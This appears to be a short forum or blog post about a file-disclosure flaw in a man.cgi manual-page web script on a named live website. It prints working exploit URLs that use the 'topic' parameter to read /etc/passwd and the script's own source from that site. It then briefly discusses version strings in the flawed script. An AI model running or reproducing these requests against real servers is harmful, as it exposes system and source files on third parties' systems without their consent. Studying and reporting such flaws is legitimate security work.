= Update = When will they ever learn? = Exploit = [code] http://www.ctssn.com/man/index.cgi?section=all&topic=%2Fetc%2Fpasswd http://www.ctssn.com/man/index.cgi?topic=./index.cgi http://www.ctssn.com/man/index.cgi?topic=man [/code] as always if they read their own manual page... Update: I looked again into this site to try to craft a vulnerability report: [code] http://www.ctssn.com/man/index.cgi?section=all&topic=/home/aaron/www/ctssn.com/html/man/index.cgi [/code] = Analysis = And their isquestionable string is not the same as the one included on the cpan website, yet the modified date is back in '97. They are using the latest version of man2html though, 3.0.1. Perhaps man.cgi has been updated and many bad man.cgi copies are still floating around, or the source code was fixed without changing the modified date in the tarball. This is an odd development. It seems every site I run into running this code is flawed -- why would there be so many flawed sites created after the last modified date?